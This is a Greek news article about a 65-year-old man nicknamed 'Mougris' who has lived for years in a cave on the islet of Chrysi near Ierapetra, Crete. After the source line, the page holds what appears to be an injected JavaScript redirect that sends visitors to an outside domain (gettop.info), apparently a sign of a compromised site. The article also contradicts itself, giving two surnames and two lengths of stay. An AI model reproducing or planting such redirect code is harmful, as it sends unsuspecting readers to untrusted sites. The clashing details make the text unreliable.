Ο σύγχρονος «Ροβινσώνας Κρούσος» – Ζει εδώ και 15 χρόνια σε σπηλιά στην Κρήτη (ΒΙΝΤΕΟ)

0
33

 

 

O Μανώλης Γιατράκος αποφάσισε πριν από 20 χρόνια να απομονωθεί σε μια σπηλιά στο νησάκι Χρυσή, το οποίο βρίσκεται περίπου 10 μίλια νότια της Ιεράπετρας της Κρήτης.

Ο «Μουγκρής» (χέλι) όπως είναι το παρατσούκλι του είναι ο Μανώλης Γιατάκης, 65 ετών, παντρεμένος 42 χρόνια με 5 παιδιά και 7 εγγόνια με καταγωγή από την Ιεράπετρα.
Στο νησί βρέθηκε η κάμερα της εκπομπής «Αλήθειες με τη Ζήνα», προκειμένου να καταγράψει λίγες ώρες από την καθημερινότητά του στο νησί.

Ο «Μουγκρής», όπως λέει, μένει στο νησί χειμώνα καλοκαίρι εδώ και 15 χρόνια και είναι ένας πολύ κοινωνικός άνθρωπος με όλους όσοι επισκέπτονται το νησί.
Η καθημερινότητα του στο νησί είναι πολύ ήρεμη και πολύ αναζωογονητική, όντας ένα πολύ μεγάλο κομμάτι της ζωής του. Τον χειμώνα μαζεύει ξύλα από τη θάλασσα έτσι ώστε να ανάψει φωτιά και να φτιάξει φαγητό έχοντας και μια ξυλόσομπα, ενώ όταν βρέχει μπαίνει στη σκηνή του. Προσαρμόζεται στις συνθήκες και μάλιστα δεν του έχει λείψει καθόλου κάτι έτσι ώστε να φύγει έστω για λίγο από την Χρυσή.
Η φύση του χαρίζει απλόχερα όλο της το μεγαλείο και τον αποζημιώνει με την επιλογή του να μείνει μόνιμα εκεί.

Πήρε το παρατσούκλι του από ένα ευέλικτο είδος χελιού επιθετικό με κοφτερά δόντια. Ο ίδιος δηλώνει ότι βρήκε το καταφύγιο του στη Χρυσή από το 1968 όπου την επισκέφτηκε για πρώτη φορά και διηγείται πως επιβιώνει στο νησί χωρίς όλα εκείνα που ο πολιτισμός μας θεωρεί απαραίτητα.

 

Πηγή: entertv.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here